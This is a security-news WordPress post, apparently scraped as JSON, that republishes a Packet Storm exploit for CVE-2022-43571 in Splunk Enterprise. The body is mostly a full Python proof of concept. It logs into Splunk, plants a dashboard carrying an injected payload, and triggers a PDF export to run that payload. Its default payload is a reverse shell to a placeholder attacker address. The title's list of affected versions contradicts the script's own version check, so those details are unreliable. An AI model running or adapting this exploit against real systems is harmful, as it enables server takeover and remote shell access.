{"id":42057,"date":"2026-02-20T17:46:42","date_gmt":"2026-02-20T17:46:42","guid":{"rendered":"http:\/\/localhost\/?p=42057"},"modified":"2026-02-20T17:46:42","modified_gmt":"2026-02-20T17:46:42","slug":"splunk-enterprise-829-902-authenticated-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=42057","title":{"rendered":"\ud83d\udcc4 Splunk Enterprise 8.2.9 \/ 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966"},"content":{"rendered":"

{“lastseen”:”2026-02-20T22:59:21″,”description”:”Proof of concept exploit for CVE-2022-43571, a critical authenticated remote code execution vulnerability affecting Splunk Enterprise versions 8.2.9 and 9.0.2. The flaw resides in the SimpleXML dashboard PDF generation process, where insufficient input…”,”published”:”2026-02-20T00:00:00″,”modified”:”2026-02-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Splunk Enterprise 8.2.9 \/ 9.0.2 Authenticated Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:215966″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2022-43571″],”sourceData”:”=============================================================================================================================================\\n | # Title : Splunk Enterprise 8.2.9 \/ 9.0.2 Authenticated Remote Code Execution via PDF Dashboard Rendering |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.splunk.com |\\n =============================================================================================================================================\\n \\n [+] Summary : CVE\u20112022\u201143571 is a critical authenticated Remote Code Execution (RCE) vulnerability affecting Splunk Enterprise. \\n The flaw resides in the SimpleXML dashboard PDF generation process, where insufficient input sanitization allows a privileged authenticated user to inject malicious content into dashboard configurations. \\n \\t\\t\\t\\t When the affected dashboard is exported to PDF, the injected content may be executed in the context of the Splunk server, potentially leading to full system compromise. \\n Successful exploitation requires valid Splunk credentials but can result in arbitrary command execution, data exposure, and lateral movement. Splunk has released patches, \\n \\t\\t\\t\\t and immediate upgrading to a fixed version is strongly recommended.\\n \\n [+] Usage : \\n \\n pip install requests packaging\\n \\n # For testing only : python poc.py -u https:\/\/splunk.example.com:8000 –username admin –password password –check-only\\n \\n # To run the exploit : python poc.py -u https:\/\/splunk.example.com:8000 –username admin –password password\\n \\n [+] POC :\\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import random\\n import string\\n import re\\n import sys\\n import time\\n import urllib.parse\\n from typing import Optional, Dict, Tuple\\n import base64\\n import json\\n \\n class SplunkExploit:\\n def __init__(self, target_url: str, username: str, password: str, use_inline_query: bool = False):\\n self.target_url = target_url.rstrip(‘\/’)\\n self.username = username\\n self.password = password\\n self.use_inline_query = use_inline_query\\n self.session = requests.Session()\\n self.session.verify = False\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n })\\n \\n self.cookie = None\\n self.target_app = None\\n self.dash_name = None\\n \\n def splunk_login(self) -\\u003e Optional[str]:\\n \\”\\”\\”Authenticate to Splunk and return session cookie.\\”\\”\\”\\n login_url = f\\”{self.target_url}\/en-US\/account\/login\\”\\n \\n resp = self.session.get(login_url)\\n if resp.status_code != 200:\\n print(f\\”[-] Failed to access login page: {resp.status_code}\\”)\\n return None\\n \\n cval_match = re.search(r’name=\\”cval\\”\\\\s+value=\\”([^\\”]+)\\”‘, resp.text)\\n if not cval_match:\\n print(\\”[-] Could not find cval token\\”)\\n return None\\n \\n cval = cval_match.group(1)\\n \\n login_data = {\\n ‘cval’: cval,\\n ‘username’: self.username,\\n ‘password’: self.password,\\n ‘set_has_logged_in’: ‘false’\\n }\\n \\n resp = self.session.post(\\n f\\”{self.target_url}\/en-US\/account\/login\\”,\\n data=login_data,\\n allow_redirects=False\\n )\\n \\n if resp.status_code in [302, 200]:\\n \\n if ‘splunkweb_csrf_token’ in self.session.cookies:\\n self.cookie = f\\”splunkweb_csrf_token={self.session.cookies[‘splunkweb_csrf_token’]}\\”\\n print(f\\”[+] Successfully logged in as {self.username}\\”)\\n return self.cookie\\n \\n print(\\”[-] Login failed\\”)\\n return None\\n \\n def check_splunk_version(self) -\\u003e Tuple[bool, str]:\\n \\”\\”\\”Check if Splunk version is vulnerable.\\”\\”\\”\\n if not self.cookie:\\n self.cookie = self.splunk_login()\\n if not self.cookie:\\n return False, \\”Login failed\\”\\n \\n version_url = f\\”{self.target_url}\/en-US\/app\/launcher\/home\\”\\n headers = {‘Cookie’: self.cookie}\\n \\n resp = self.session.get(version_url, headers=headers)\\n if resp.status_code != 200:\\n return False, f\\”Failed to access home page: {resp.status_code}\\”\\n \\n version_match = re.search(r’Splunk\u00ae\\\\s+([\\\\d\\\\.]+)’, resp.text)\\n if version_match:\\n version_str = version_match.group(1)\\n print(f\\”[+] Found Splunk version: {version_str}\\”)\\n \\n from packaging import version as pkg_version\\n \\n try:\\n v = pkg_version.parse(version_str)\\n \\n if (pkg_version.parse(\\”8.1.0\\”) \\u003c= v \\u003c= pkg_version.parse(\\”8.1.11\\”)) or \\\\\\n (pkg_version.parse(\\”8.2.0\\”) \\u003c= v \\u003c= pkg_version.parse(\\”8.2.8\\”)) or \\\\\\n (pkg_version.parse(\\”9.0.0\\”) \\u003c= v \\u003c= pkg_version.parse(\\”9.0.1\\”)):\\n return True, f\\”Vulnerable version found: {version_str}\\”\\n else:\\n return False, f\\”Non-vulnerable version: {version_str}\\”\\n except Exception as e:\\n print(f\\”[-] Error parsing version: {e}\\”)\\n return False, \\”Could not parse version\\”\\n \\n return False, \\”Could not determine version\\”\\n \\n def gen_inline_splunk_query(self) -\\u003e str:\\n \\”\\”\\”Generate an inline Splunk query.\\”\\”\\”\\n row_id_name = self.random_string(8, 16)\\n arr_field = self.random_string(8, 16)\\n \\n rand_count = random.randint(100, 500)\\n step = random.randint(2, 15)\\n \\n col_count = random.randint(3, 10)\\n column_names = [self.random_string(8, 16) for _ in range(col_count)]\\n \\n delimiter = random.choice([‘;’, ‘|’, ‘:’, ‘#’, ‘!’])\\n names_string = delimiter.join(column_names)\\n \\n query = f\\”\\”\\”\\n | makeresults count={rand_count}\\n | streamstats count as {row_id_name}\\n | eval _time = now() – ({row_id_name} * {step}),\\n {arr_field} = split(\\”{names_string}\\”, \\”{delimiter}\\”),\\n sourcetype = mvindex({arr_field}, {row_id_name} % {col_count})\\n | chart sparkline count by sourcetype\\n \\”\\”\\”\\n \\n return query.strip()\\n \\n def get_system_index_splunk_query(self) -\\u003e str:\\n \\”\\”\\”Get a query using system indexes.\\”\\”\\”\\n rand_tail = random.randint(100, 200)\\n index = random.choice([‘_internal’, ‘_audit’, ‘_introspection’])\\n return f\\”index={index} | tail {rand_tail} | chart sparkline count by sourcetype\\”\\n \\n def random_string(self, min_len: int = 8, max_len: int = 16) -\\u003e str:\\n \\”\\”\\”Generate random alphanumeric string.\\”\\”\\”\\n length = random.randint(min_len, max_len)\\n return ”.join(random.choices(string.ascii_letters + string.digits, k=length))\\n \\n def get_random_app(self, enabled: bool = True) -\\u003e str:\\n \\”\\”\\”Get a random app name (simplified).\\”\\”\\”\\n \\n common_apps = [‘search’, ‘launcher’, ‘splunk_monitoring_console’]\\n return random.choice(common_apps)\\n \\n def create_dashboard(self, app: str, dash_name: str, template: str) -\\u003e bool:\\n \\”\\”\\”Create a dashboard with malicious template.\\”\\”\\”\\n create_url = f\\”{self.target_url}\/en-US\/splunkd\/__raw\/servicesNS\/{self.username}\/{app}\/data\/ui\/views\\”\\n \\n headers = {\\n ‘Cookie’: self.cookie,\\n ‘Content-Type’: ‘application\/x-www-form-urlencoded’,\\n ‘X-Splunk-Form-Key’: self.get_form_key()\\n }\\n \\n data = {\\n ‘name’: dash_name,\\n ‘eai:data’: template\\n }\\n \\n resp = self.session.post(create_url, headers=headers, data=data)\\n if resp.status_code in [200, 201]:\\n print(f\\”[+] Dashboard ‘{dash_name}’ created successfully\\”)\\n return True\\n \\n print(f\\”[-] Failed to create dashboard: {resp.status_code}\\”)\\n print(f\\”Response: {resp.text[:500]}\\”)\\n return False\\n \\n def get_form_key(self) -\\u003e str:\\n \\”\\”\\”Extract form key from Splunk page.\\”\\”\\”\\n home_url = f\\”{self.target_url}\/en-US\/app\/launcher\/home\\”\\n headers = {‘Cookie’: self.cookie}\\n \\n resp = self.session.get(home_url, headers=headers)\\n if resp.status_code == 200:\\n match = re.search(r’formKey\\\\s*:\\\\s*\\”([^\\”]+)\\”‘, resp.text)\\n if match:\\n return match.group(1)\\n \\n return self.random_string(32, 32)\\n \\n def export_dashboard(self, app: str, dash_name: str) -\\u003e bool:\\n \\”\\”\\”Trigger PDF export of dashboard to execute payload.\\”\\”\\”\\n export_url = f\\”{self.target_url}\/en-US\/api\/pdfgen\/render\\”\\n \\n headers = {\\n ‘Cookie’: self.cookie,\\n ‘Content-Type’: ‘application\/json’,\\n ‘X-Splunk-Form-Key’: self.get_form_key()\\n }\\n \\n payload = {\\n ‘serverURL’: f\\”{self.target_url}\/en-US\\”,\\n ‘app’: app,\\n ‘dashboard’: dash_name,\\n ‘width’: 1000,\\n ‘height’: 800\\n }\\n \\n try:\\n resp = self.session.post(\\n export_url,\\n headers=headers,\\n json=payload,\\n timeout=30\\n )\\n \\n print(\\”[+] PDF export triggered (payload execution attempted)\\”)\\n return True\\n \\n except Exception as e:\\n print(f\\”[*] Export request completed (expected if payload executes): {e}\\”)\\n return True\\n \\n def delete_dashboard(self, app: str, dash_name: str) -\\u003e bool:\\n \\”\\”\\”Delete the created dashboard.\\”\\”\\”\\n delete_url = f\\”{self.target_url}\/en-US\/splunkd\/__raw\/servicesNS\/{self.username}\/{app}\/data\/ui\/views\/{dash_name}\\”\\n \\n headers = {\\n ‘Cookie’: self.cookie,\\n ‘X-Splunk-Form-Key’: self.get_form_key()\\n }\\n \\n resp = self.session.delete(delete_url, headers=headers)\\n if resp.status_code in [200, 204]:\\n print(f\\”[+] Dashboard ‘{dash_name}’ deleted\\”)\\n return True\\n \\n return False\\n \\n def generate_malicious_template(self, payload: str) -\\u003e str:\\n \\”\\”\\”Generate malicious dashboard template with payload.\\”\\”\\”\\n if self.use_inline_query:\\n splunk_query = self.gen_inline_splunk_query()\\n else:\\n splunk_query = self.get_system_index_splunk_query()\\n \\n style_param = random.choice([‘lineColor’, ‘fillColor’])\\n escaped_payload = urllib.parse.quote(payload)\\n \\n template = f\\”\\”\\”\\u003cdashboard\\u003e\\n \\u003crow\\u003e\\n \\u003cpanel\\u003e\\n \\u003ctable\\u003e\\n \\u003csearch\\u003e\\n \\u003cquery\\u003e\\n {splunk_query}\\n \\u003c\/query\\u003e\\n \\u003c\/search\\u003e\\n \\u003cformat field=\\”sparkline\\” type=\\”sparkline\\”\\u003e\\n \\u003coption name=\\”{style_param}\\”\\u003e{escaped_payload}\\u003c\/option\\u003e\\n \\u003c\/format\\u003e\\n \\u003c\/table\\u003e\\n \\u003c\/panel\\u003e\\n \\u003c\/row\\u003e\\n \\u003c\/dashboard\\u003e\\”\\”\\”\\n \\n lines = template.split(‘\\\\n’)\\n return ‘\\\\n’.join(line.strip() for line in lines if line.strip())\\n \\n def exploit(self, reverse_shell_payload: str = None) -\\u003e bool:\\n \\”\\”\\”Execute the full exploit chain.\\”\\”\\”\\n print(\\”[*] Starting Splunk RCE exploit (CVE-2022-43571)\\”)\\n \\n print(\\”[*] Attempting to login…\\”)\\n if not self.splunk_login():\\n return False\\n \\n print(\\”[*] Checking Splunk version…\\”)\\n is_vuln, msg = self.check_splunk_version()\\n print(f\\”[*] {msg}\\”)\\n if not is_vuln:\\n print(\\”[-] Target does not appear to be vulnerable\\”)\\n return False\\n \\n if not reverse_shell_payload:\\n # Example Python reverse shell payload\\n reverse_shell_payload = \\”\\”\\”__import__(‘os’).system(‘python3 -c \\”import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\\\\\\\\\”YOUR_IP\\\\\\\\\\\\\\”,YOUR_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\\\\\\\\\\\\\\”\/bin\/sh\\\\\\\\\\\\\\”,\\\\\\\\\\\\\\”-i\\\\\\\\\\\\\\”])\\”‘)\\”\\”\\”\\n \\n print(f\\”[*] Using payload: {reverse_shell_payload[:50]}…\\”)\\n \\n print(\\”[*] Generating malicious dashboard template…\\”)\\n template = self.generate_malicious_template(reverse_shell_payload)\\n \\n self.target_app = self.get_random_app()\\n self.dash_name = self.random_string(8, 16)\\n \\n print(f\\”[*] Target app: {self.target_app}\\”)\\n print(f\\”[*] Dashboard name: {self.dash_name}\\”)\\n \\n print(\\”[*] Creating dashboard…\\”)\\n if not self.create_dashboard(self.target_app, self.dash_name, template):\\n return False\\n \\n print(\\”[*] Triggering PDF export to execute payload…\\”)\\n if not self.export_dashboard(self.target_app, self.dash_name):\\n print(\\”[-] Failed to trigger export\\”)\\n \\n time.sleep(5)\\n \\n print(\\”[*] Attempting to cleanup…\\”)\\n self.delete_dashboard(self.target_app, self.dash_name)\\n \\n print(\\”[+] Exploit completed\\”)\\n return True\\n \\n def cleanup(self):\\n \\”\\”\\”Cleanup created resources.\\”\\”\\”\\n if self.target_app and self.dash_name:\\n self.delete_dashboard(self.target_app, self.dash_name)\\n \\n def main():\\n \\”\\”\\”Main function for standalone execution.\\”\\”\\”\\n import argparse\\n \\n parser = argparse.ArgumentParser(description=’Splunk RCE Exploit (CVE-2022-43571)’)\\n parser.add_argument(‘-u’, ‘–url’, required=True, help=’Splunk base URL (e.g., https:\/\/splunk.example.com:8000)’)\\n parser.add_argument(‘–username’, default=’admin’, help=’Splunk username (default: admin)’)\\n parser.add_argument(‘–password’, required=True, help=’Splunk password’)\\n parser.add_argument(‘–inline-query’, action=’store_true’, help=’Use inline Splunk query’)\\n parser.add_argument(‘–check-only’, action=’store_true’, help=’Only check if target is vulnerable’)\\n \\n args = parser.parse_args()\\n \\n import urllib3\\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n exploit = SplunkExploit(\\n target_url=args.url,\\n username=args.username,\\n password=args.password,\\n use_inline_query=args.inline_query\\n )\\n \\n try:\\n if args.check_only:\\n is_vuln, msg = exploit.check_splunk_version()\\n print(f\\”\\\\n{‘=’*50}\\”)\\n print(f\\”Check Results: {msg}\\”)\\n print(f\\”{‘=’*50}\\”)\\n sys.exit(0 if is_vuln else 1)\\n else:\\n success = exploit.exploit()\\n sys.exit(0 if success else 1)\\n \\n except KeyboardInterrupt:\\n print(\\”\\\\n[*] Exploit interrupted by user\\”)\\n exploit.cleanup()\\n sys.exit(1)\\n except Exception as e:\\n print(f\\”\\\\n[-] Error: {e}\\”)\\n exploit.cleanup()\\n sys.exit(1)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215966″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215966\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-20T22:59:21″,”description”:”Proof of concept exploit for CVE-2022-43571, a critical authenticated remote code execution vulnerability affecting Splunk Enterprise versions 8.2.9 and 9.0.2. The flaw resides in the…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-42057","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Splunk Enterprise 8.2.9 \/ 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=42057\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Splunk Enterprise 8.2.9 \/ 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-20T22:59:21″,”description”:”Proof of concept exploit for CVE-2022-43571, a critical authenticated remote code execution vulnerability affecting Splunk Enterprise versions 8.2.9 and 9.0.2. The flaw resides in the...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=42057\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-20T17:46:42+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42057#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42057\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Splunk Enterprise 8.2.9 \\\/ 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966\",\"datePublished\":\"2026-02-20T17:46:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42057\"},\"wordCount\":2254,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=42057#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42057\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42057\",\"name\":\"\ud83d\udcc4 Splunk Enterprise 8.2.9 \\\/ 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-20T17:46:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42057#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=42057\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42057#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Splunk Enterprise 8.2.9 \\\/ 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Splunk Enterprise 8.2.9 \/ 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=42057","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Splunk Enterprise 8.2.9 \/ 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966 - zero redgem","og_description":"{“lastseen”:”2026-02-20T22:59:21″,”description”:”Proof of concept exploit for CVE-2022-43571, a critical authenticated remote code execution vulnerability affecting Splunk Enterprise versions 8.2.9 and 9.0.2. The flaw resides in the...","og_url":"https:\/\/zero.redgem.net\/?p=42057","og_site_name":"zero redgem","article_published_time":"2026-02-20T17:46:42+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=42057#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=42057"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Splunk Enterprise 8.2.9 \/ 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966","datePublished":"2026-02-20T17:46:42+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=42057"},"wordCount":2254,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=42057#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=42057","url":"https:\/\/zero.redgem.net\/?p=42057","name":"\ud83d\udcc4 Splunk Enterprise 8.2.9 \/ 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-20T17:46:42+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=42057#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=42057"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=42057#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Splunk Enterprise 8.2.9 \/ 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/42057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=42057"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/42057\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=42057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=42057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=42057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}